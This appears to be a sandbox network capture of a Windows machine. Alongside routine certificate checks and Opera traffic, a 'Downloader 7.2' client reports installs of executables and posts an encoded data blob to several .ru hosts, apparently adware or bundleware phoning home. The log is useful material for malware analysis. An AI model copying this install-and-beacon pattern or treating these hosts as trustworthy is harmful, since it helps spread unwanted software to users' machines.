Server: Apache

ETag: "4688e1604f5716a3ae928e1cc91208f8:1424682662"

Last-Modified: Mon, 23 Feb 2015 09:11:02 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Content-Length: 10807

Connection: keep-alive

Content-Type: application/pkix-crl
0.*30.).0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U.
...Cape Town1.0...U....Thawte Consulting cc1(0&..U....Certification Se
rvices Division1!0...U....Thawte Premium Server CA1(0&..*.H........pre
mium-server@thawte.com..150223090053Z..150305090053Z0.(.0!....l.C`..L.
%|\.T...130819183955Z0!....T..W...p.[..%...100322161038Z0!....hx.....k
...7....130919164724Z0!....$#.R|..$.....j..130926101045Z0!...!P..6{.lS
.@...5..130927150657Z0!...Da\v..........%..130920062728Z0!...>.e..-
...s[.2I...140418142220Z0!....dU...(...=...*..140801114607Z0!........d
.{#E..9`...130926061856Z0!....6..q.'tT..1.Q...130926062249Z0!.....cXzF
..(O0.|.N..131002103626Z0!............>..i....130528164218Z0!......
....#.P.......130716072254Z0!.....%.......R......100801221434Z0!.....M
..HK.....x....130926060355Z0!....k."..z......64..130919082450Z0!...N..
D...0....`H2..130829152308Z0!......Q..m...A..j...100226190909Z0!.....-
...k......h...130930085951Z0!....1....c...s.>9t..100215170304Z0!...
W..._....%..I....130926063253Z0!..._._~gq.I.)q6@g...131025034600Z0!...
..=X>...]..h5@...130920130332Z0!.............U.<....100318180248
Z0!... .(........n.S...130923202627Z0!....rF..O..#^.......100312081338
Z0!.....:...B..=]Hsx_..130920011556Z0!...z..1).Ht.........100323155426
Z0!.... ....z.i.a.nl...100312213725Z0!...>.K.H.'.tx.P.....100319033
236Z0!...K.......Y.>......130815051547Z0!....>.ITt.Aw%*I.....130
918091937Z0!....-.U.BC{#...x....120301162056Z0!...q.(6.]...6b&..u..130
930045919Z0!....b......d./1Q.|..130919194338Z0!..........1S..Pp...<<< skipped >>>

GET /launch_install?name=go_search_taskbar.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=72ff008b16006154dc070d945474c1849a84d99b5f42bcb48c4f60d1bf607a46&md5=f559ddd5ecfeb426dc00c567b9dd0cee&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:36:13 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:36:13 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

POST /software_install?hetag=bba9e197f9f68f6e3b7c53519e87cb75&hash=HASH&file_id=32888998&did=1497824015&ext_partner_id=&Opera_ua=1 HTTP/1.1

Content-Type: multipart/form-data; boundary=5GsEbvokb5IVgWaebmXeO7JhvJof0L

User-Agent: Downloader 7.2

Host: forces.vseturbo.ru

Content-Length: 201

Cache-Control: no-cache

--5GsEbvokb5IVgWaebmXeO7JhvJof0L

Content-Disposition: form-data; name="data"

.).pl8`w.0sh<... .g1p.c...o.x.x.D...@.._....
.HW..T......KC........5t`.8,8.S8o.-`

--5GsEbvokb5IVgWaebmXeO7JhvJof0L--


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:31:32 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:31:32 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET /speeddials/partner/yandex_mail_ua_uk HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/yandex_mail_ua/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2598682956

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /speeddials/partner/price_ua HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/price_ua/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2598682987

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/price_ua/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "706741-6777-50ecea1134600"

Content-Type: image/png

Content-Length: 26487

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2724644883 2724589225

Age: 159

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 30
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:CCA0
F6C0BED611E28F85D5EC1B7B836C" xmpMM:InstanceID="xmp.iid:CCA0F6BFBED611
E28F85D5EC1B7B836C" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8C7021171320681180
83C1680B1A71F7" stRef:documentID="xmp.did:4905A1941A226811822A85CA6146
66AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>la....c.IDATx....[]I.%z...3...7w....y......
..!.yo..#..NH.#.. @8U..{..........y..=?.........f...y(...../..........
.I.k.. ....o&6hP...^8=h.......A.f.M....IM.&.......C.f........N.3...|..
e<.Hf....mVh... ...(.kn.0<..(9..ox....`z.f.=E.f.......$ep....H6_
.@.x}.Q.....<....1...s.y.Y#.).!.*...`I.D..L>.J...hH\.PL3....A.8.
...O\..j.q&'1..n........,3....*...|...It..N.L....p&?8..(in>N....7/.
%..M\d..?.NM.L.^.C........;...-...o....eu.8..H9.tW5......G,..........-
._.B...i..ETH>:6XQr.|...P....l....I.G.....9'..<{l...keF.2...<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=545089, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 16:57:49 GMT

Expires: Sun, 1 Mar 2015 16:57:49 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2165749Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...O..Z.}.~......;.....20150222165749Z....20150301165749Z0...*.H.....
.........}.8..,..5..VSd......D.../...e....u(...>{Po.|.._y@?.}...kN?
.nC...,A.g......|.Z"......h...n..(.......Y.................O(/g..HL...
.5W..Os.O'.......'.Yi#.......6X.m..I".o.#.K.Jv}....."w.x..6.. .}...*.?
............ ...Cb.....f.z...y.h..R..%.yR.../U.%T..H..1v.....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-..<<< skipped >>>

GET /baltimoreroot/MEUwQzBBMD8wPTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom/nYB45SPUEwQU5Z1ZMIJHWMys+ghUNoZ7OrUETfACBAcnqkc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.omniroot.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: application/ocsp-response

Date: Mon, 23 Feb 2015 09:32:31 GMT

Last-Modified: Thu, 19 Feb 2015 19:47:05 GMT

Server: ECS (ams/D1C2)

X-Cache: HIT

Content-Length: 1406
0..z......s0..o.. .....0.....`0..\0......`;.l.uZ..k.F..^|A.Tb..2015021
9184611Z0g0e0=0... ........./Ev..Y..].....x.#......Y0.GX....T6.{:..M..
..'.G....20150204201215Z....20150519201715Z0...*.H.............2...<
;]...v ..C.~@K.=w...R....W.....0.....~..g~.<.h.@..u...m..Y.b=..Ao..
&..vq...N...JS...P~..`.../^.ji........X..N z.Pw..}....p.<w...r1A.mh
.hr...#..z.?O...W....Y.)....`...<.Clb...v.......".\.(..^8*...G.....
..u..V.1^..5uA5.kw.j..`.Y\.............$.P...,.........0...0...0......
.....'..0...*.H........0Z1.0...U....IE1.0...U....Baltimore1.0...U....C
yberTrust1"0 ..U....Baltimore CyberTrust Root0...150114195242Z..160114
195229Z0G1.0...U....US1.0...U....Cybertrust1#0!..U....Cybertrust-Valid
ation-20110.."0...*.H.............0.........?....(Fb....G... ..=..(L..
wK...04..I......C...1.Z......U.$b.f..Pa.....S...#..B.........^T..IP8..
........h8GM..*.4.MP..../D4n.=ZTeH.B=kOT.v..2@F.2L..A...yn.4......fP..
.L...2.x....$..@@....q2...Uby.e......D....lf...C....ZP}O......7...mM..
c.g..j.\.>.O....G.A........0..0... .....0......0...U.......0.0...U.
..........0...U.%..0... .......0...U.#..0.....Y0.GX....T6.{:..M.0...U.
.....`;.l.uZ..k.F..^|A.Tb0...*.H.............n.h\Ch*G.c..yr..."._....J
.-....j.t%..e.....(.h@.Z.7.a!m...sZH.N..>.S....K..........7wi3..x.D
..l..ud.....CC......<.&.2. ..d...T.......;.S....\... ......m.6.....
.#(.&....q.[z.........r..T....W...7ea.}..B.1........al.]i.F...-.0c...y
.=?....E...........'>..O.._..<<< skipped >>>

GET /pki/mscorp/crl/msitwww2.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: mscrl.microsoft.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=6485

Content-Type: application/pkix-crl

Date: Mon, 23 Feb 2015 09:32:32 GMT

Etag: "db7d2673984dd01:0"

Last-Modified: Sat, 21 Feb 2015 05:37:15 GMT

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

Server: ECAcc (fcn/40BC)

VTag: 27931941900000000

X-Cache: HIT

X-Powered-By: ASP.NET

Content-Length: 59435

0..'0......0...*.H........0..1.0...U....US1.0...U....Washington1.0...U
....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft IT1.0.
..U....Microsoft IT SSL SHA2..150221052711Z..150301054711Z0...02..Z...
;.,k..0R......;..140527155450Z0.0...U.......02..Z...:h..jg.E......:..1
40527155449Z0.0...U.......02..Z...5$.A{.2.......5..140527155449Z0.0...
U.......02..Z...4.....D'Y.....4..140527155449Z0.0...U.......02..Z...2.
a...........2..140527155445Z0.0...U.......02..Z...1.....,.......1..140
527155444Z0.0...U.......02..Z...0.g.<..Q......0..140527155440Z0.0..
.U.......02..Z.../..W........../..140527155439Z0.0...U.......02..Z....
....<...........140527155436Z0.0...U.......02..Z...-d..Z..K>....
.-..140527155434Z0.0...U.......02..Z...,\...<.X......,..14052715543
0Z0.0...U.......02..Z... ..d!.y....... ..140527155428Z0.0...U.......02
..Z...*.v#..?'......*..140527155425Z0.0...U.......02..Z...).!=..6.....
..)..140527155423Z0.0...U.......02..Z...(wG...........(..140527155421Z
0.0...U.......02..Z...'..b..z.W.....'..140527155418Z0.0...U.......02..
Z...&..^/O.(......&..140527155416Z0.0...U.......02..Z...%.....nsc.....
%..140527155414Z0.0...U.......02..Z...$O.rB .2H.....$..140527155411Z0.
0...U.......02..Z...#.,5%..F......#..140527155409Z0.0...U.......02..Z.
.."../_...s....."..140527155407Z0.0...U.......02..Z...!..../.l......!.
.140527155404Z0.0...U.......02..Z... .Y.L_.9...... ..140527155402Z0.0.
..U.......02..Z......#M~.zZ........140527155400Z0.0...U.......02..Z...
...~..].G........140527155358Z0.0...U.......02..Z....>e...X....

<<< skipped >>>

GET /follow?utm_medium=speed_dial_thumbnail&utm_source=speed_dial_computer&utm_campaign=social_follow_us_page HTTP/1.1

Host: VVV.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=3600

Content-Encoding: gzip

Content-language: en-US

Content-Type: text/html; charset=utf-8

Date: Mon, 23 Feb 2015 09:32:34 GMT

Last-Modified: Mon, 23 Feb 2015 09:30:19 GMT

Served-by: VVV.opera.com

Vary: Accept-Encoding

X-Cache: HIT:52

X-Via: 1-143135,2-ww,3-13238

Content-Length: 5762

Connection: keep-alive
...........<....u......h...H...]I..e........5.C.P..".....1`....)..H
..A.&v.....-j;.........o..I..E...../Q.....nm....y...7..<jt...7.....
...........N...v&;..<...)..].$.t.M....88.|'E7.0.a.n..4......E..PS'.
.l..B'...-.........W_[i`/v.7.....l.5U.....i.}2&..`H..1....Y.}...(...p.
ww.^Jq.x=?$..yw.......'.....D.Kh.H.....w7.{..:.1..N9:...w.....H.h?....
.aw..;.0.M...]....4K.p.._.{....wU.?...`.x>8..{......1@.w......R{d..
8.y8..I.8.3.....v.v..Q.8..<xY.w....$."'..c..=.^....~..........w..v{
S....V..9.O1cW.(..@..3z.Xwu.......'.N.....#^.............@.^og......].
...^lZ. ....mW....v.....t...I.?.K,.....')...E.Jfg2..~..Iw.......Q?..B.
..u.I...^....-..p!.......:. ;._.9.0b......r.q.P.M...O....;,..O..'.....
..q.d..~.g>.$`\@....O2oL..w...Z..SX...r.d..L6.......qk`.7...[.-....
.uC...PIdGYZ..F..........^j.......6.....@.~...a.0...F....).1Jag.....tJ
..(A."A .i@..&.............i.Cw2|..e.b..h2..Z..Y......7..6...N..hz....
..L.........c.1.n....7.;&\&Q-.T,E.U. x8.......[Q..c...>.c..Y.p<.
.L...'...........YP...(...|.R......qBk.Z@.Vj.hm...~.M.O..Q.]....fd..JN
.....39>..NMA..p....&.S)N.K3.. ....v.*6d5.)8.....e.e...........b..u
l.{8$....WW..&.5.<.....M...8..O.>.c..JC=1.M..M...u.uhS}8...i)..(
`..8....! ....9.M.....M.4M.,b........(.A........;..l..6*....T....lJ.&l
t;..&.Jd...j..a..*kXSe..&...5lGmQ...........RG.K..k.U]Vt.EW.d...ul....
..I]..P*pnJ....6..i.e...m.......5l].......a... .-....R*L..<}|f... .
..4..Gi...:).5......"d.0..`...]......A.f`.,....F..0.faSY.{.c.......P%W
....x...!..^D.....\.e...t....S.Q.....lSS5L.P.u.>3.`l...........<<< skipped >>>

GET /favicon.ico HTTP/1.1

Host: VVV.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=604800

Content-Type: image/x-icon

Date: Mon, 23 Feb 2015 09:34:21 GMT

Expires: Mon, 02 Mar 2015 09:33:55 GMT

Last-Modified: Mon, 16 Jun 2014 11:12:32 GMT

Vary: Accept-Encoding

X-Cache: HIT:17

X-Via: 2-ww,3-147162

Content-Length: 15086

Connection: keep-alive
............ .h...6...  .... .........00.... ..%..F...(....... ..... .
......................................................................
........................................&...^;...L...L..Z:.. .........
............................$..6& ..&!..'"..'"..&!..&!..% .1..........
..................(#.G &..,&.. %..(!.s(!.w %..,&..,&..)$.?............
........'#../*..0 ..0*..,&.m........ %.x0*..0 ../*..($................
..0 .q40..50..4/..-'.0........,&.94/..50..50..1,.e..............u.72..
:5..:5..94..-(..........-'."83..:6..:6..73....2.........3/..>:..?&l
t;..?<..>9...(...........)..=9..?<..?<..>:..*'.........
.:6..DA..EB..EB..C?..1 ..........1,..B?..EB..EB..D@..0,..........($..H
E..LI..LI..JG..72..........72..IF..LI..LI..HE..................JG..RP.
.SQ..QO..A=.(........@<.0PN..SQ..SQ..KI.{................GD.4VU..YX
..XW..MJ.V........KI.aXW..YX..WU..HE.,..................~.TR.q]\.._^..
[Y..MJ.;LI.?ZX.._^..^]..US.g........................=9..XV.e`_..cb..ba
..ba..cb..a`..YW.];6..................................SQ..\[.P_].t_^.s
][.NTQ................................................................
......................................................................
................(... ...@..... .......................................
......................................................................
......................................................................
......................................................................
..................................................................<<< skipped >>>

HEAD /go_chxtn4.7z HTTP/1.1

Host: xtnmailru.cdnmail.ru

Connection: close


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:18 GMT

Content-Type: application/x-7z-compressed

Content-Length: 31291

Connection: close

Last-Modified: Wed, 17 Dec 2014 16:01:56 GMT

ETag: "5491a8f4-7a3b"

Accept-Ranges: bytes

GET /update/2/version.txt?type=prog_set&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=11&tool=sputnik&target=ff&prog=xtn_vbm&event=done HTTP/1.1

Host: mrds.mail.ru

Accept: */*

User-Agent: FULLSTUFF

Connection: close


HTTP/1.1 204 No Content

Server: nginx

Date: Mon, 23 Feb 2015 09:32:20 GMT

Connection: close

GET /baltimoreroot/MEUwQzBBMD8wPTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom/nYB45SPUEwQU5Z1ZMIJHWMys+ghUNoZ7OrUETfACBAcnqkc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.omniroot.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: application/ocsp-response

Date: Mon, 23 Feb 2015 09:32:31 GMT

Last-Modified: Thu, 19 Feb 2015 19:47:05 GMT

Server: ECS (ams/D1C2)

X-Cache: HIT

Content-Length: 1406
0..z......s0..o.. .....0.....`0..\0......`;.l.uZ..k.F..^|A.Tb..2015021
9184611Z0g0e0=0... ........./Ev..Y..].....x.#......Y0.GX....T6.{:..M..
..'.G....20150204201215Z....20150519201715Z0...*.H.............2...<
;]...v ..C.~@K.=w...R....W.....0.....~..g~.<.h.@..u...m..Y.b=..Ao..
&..vq...N...JS...P~..`.../^.ji........X..N z.Pw..}....p.<w...r1A.mh
.hr...#..z.?O...W....Y.)....`...<.Clb...v.......".\.(..^8*...G.....
..u..V.1^..5uA5.kw.j..`.Y\.............$.P...,.........0...0...0......
.....'..0...*.H........0Z1.0...U....IE1.0...U....Baltimore1.0...U....C
yberTrust1"0 ..U....Baltimore CyberTrust Root0...150114195242Z..160114
195229Z0G1.0...U....US1.0...U....Cybertrust1#0!..U....Cybertrust-Valid
ation-20110.."0...*.H.............0.........?....(Fb....G... ..=..(L..
wK...04..I......C...1.Z......U.$b.f..Pa.....S...#..B.........^T..IP8..
........h8GM..*.4.MP..../D4n.=ZTeH.B=kOT.v..2@F.2L..A...yn.4......fP..
.L...2.x....$..@@....q2...Uby.e......D....lf...C....ZP}O......7...mM..
c.g..j.\.>.O....G.A........0..0... .....0......0...U.......0.0...U.
..........0...U.%..0... .......0...U.#..0.....Y0.GX....T6.{:..M.0...U.
.....`;.l.uZ..k.F..^|A.Tb0...*.H.............n.h\Ch*G.c..yr..."._....J
.-....j.t%..e.....(.h@.Z.7.a!m...sZH.N..>.S....K..........7wi3..x.D
..l..ud.....CC......<.&.2. ..d...T.......;.S....\... ......m.6.....
.#(.&....q.[z.........r..T....W...7ea.}..B.1........al.]i.F...-.0c...y
.=?....E...........'>..O.._..<<< skipped >>>

GET /touch_install?name=goinf_plugin_cis.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=3c36a3c897c868b2f0ab33ab9f46518e78ace6f39f0a90c4c9040819b0df80c2&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:24 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:35:23 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEHHKyY9lBgWVXZrYbPK9VrY= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: evcs-ocsp.ws.symantec.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1776

content-transfer-encoding: binary

Cache-Control: max-age=453247, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 15:22:44 GMT

Expires: Sat, 28 Feb 2015 15:22:44 GMT

Date: Mon, 23 Feb 2015 09:31:24 GMT

Connection: keep-alive
0..........0..... .....0......0...0..........q..6.q........m...2015022
1152244Z0s0q0I0... ........... ......%.p]..G=........B=1..!..m..y...Z.
.q...e...]..l..V.....20150221152244Z....20150228152244Z0...*.H........
.........r..'s....PB.SRI...>#..P..D.#.....;..-..;JO.hD|6.)W........
.L..1O.8..A.=..;....r({...?...!...<.Id...g..Z..<......a..~w.ph..
.zS.......B.H..:./K0b....X=..4%..O..6.L...)..Ed%....kd...V....Q...wf..
....m.'........=.y...h..Vq5..(h..x.7@.WQ.h.......l0.`....3w.....0...0.
..0..........:?.........B...)0...*.H........0..1.0...U....US1.0...U...
.Symantec Corporation1.0...U....Symantec Trust Network1=0;..U...4Syman
tec Class 3 Extended Validation Code Signing CA0...150107000000Z..1504
07235959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Sym
antec Trust Network1I0G..U...@Symantec Class 3 Extended Validation Cod
e Signing OCSP Responder0.."0...*.H.............0..........(.$.FZ...hp
n..G...wef......Q...8....N7.&h.[.Q...h.n..3t.>.R.."^.w..sZG>.,..
..h....G.CV........._.D..*.......E.y.h71.i.~.}.....R...[. ..L....401..
..L....|U$..'`.I....#.....P}....=>\'.rEi....p..(..|z..K.........\Q.
...pF...C..y../....H6.. ..F...........F...........[0..W0...U.......0.0
....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign.com
/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by r
eference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U..........
.0... .....0......0"..U....0...0.1.0...U....TGV-B-27630...U.#..0......
.B=1..!..m..y...Z0...U..........q..6.q........m.0...*.H...........<<< skipped >>>

GET /update?rnd=339811679857&p=gomail0&t=gomail_main&v=0 HTTP/1.1

Host: gomail.radar.imgsmail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:33 GMT

Server: imagine/radar (5115861e)

Connection: close

X-Content-Type-Options: nosniff

Content-Length: 43

Content-Type: image/gif

GIF89a.............!.......,...........L..;..

HEAD /?prod=nethost&version=1.0.0.133&action=nethost_install&guid=BF8501D34E71C08CCE258C678D1C6C1C&mid=BF8501D34E71C08CCE258C678D1C6C1C&os=6.1&bit=64&sig=d1105d88a8f18473b0f9dc575db2eded HTTP/1.1

Host: gstinfo.ru

Accept: */*


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:33:17 GMT

Content-Type: : text/plain

Content-Length: 3

Connection: keep-alive

GET /gsorganizationvalg2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBReGXQV/tqUV3SNMRE+s25eR/vhjwQUXUayjcRLdBy77fVztjq3OI91nn4CEhEhihvzIC1sAPI2iFVmRPGsPg== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp2.globalsign.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:37 GMT

Content-Type: application/ocsp-response

Content-Length: 1499

Connection: keep-alive

Set-Cookie: __cfduid=d269ab725d0396476a9756178f897750c1424684137; expires=Tue, 23-Feb-16 09:35:37 GMT; path=/; domain=.globalsign.com; HttpOnly

X-Powered-By: Servlet/3.0; JBossAS-6

ETag: 233bfe638ed423789964e5af85224ef72effb95e

Expires: Mon, 23 Feb 2015 12:48:50 GMT

Last-Modified: Sun, 22 Feb 2015 12:48:50 GMT

Cache-Control: max-age=180, public, no-transform, must-revalidate

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 1bd26f30612e0c17-AMS
0..........0..... .....0......0...0........1..aq.....P%]....<..2015
0222124850Z0u0s0K0... ........^.t....Wt.1.>.n^G.....]F...Kt....s.:.
8.u.~...!... -l..6.UfD..>....20150222124850Z....20150223124850Z0...
*.H...........KY.........n..y.....,.C..!.... .8.'.O.t4..h..iEeBFLk&-M.
.1........3..L.h=).u..;E.^.....Rl.D..b-.......Vz..f..*.<.x. ..M^...
.:o...#XX.D.N..BS...<....}...1-.}..Y..*g.0.\...c..OP.....DQT Mz...f
.w....].lM.|....Te` ..S.V2.RZ'A.b.A.`x../.......V.)...j.v..B...:UW....
0...0...0...........!m...Oq....-d)..#0...*.H........0]1.0...U....BE1.0
...U....GlobalSign nv-sa1301..U...*GlobalSign Organization Validation 
CA - G20...141212164309Z..150312164309Z0..1.0...U....BE1.0...U....Glob
alSign nv-sa1F0D..U...=GlobalSign Organization Validation CA - G2 OCSP
 responder - 11.0...U....201412121742000.."0...*.H.............0......
....{`D|L.......T..Sfj..[8....\...!...k..@>...H..T,...K.vI.v.kZ....
...'.^....4.d....dx.X......>X...O9>.p.....=..d#;@.......x.].#.$.
..I...5Z|z:....tY..6o2 7.......7X#.....c.......Z~|...Zk..c.o(.z.*,..y}
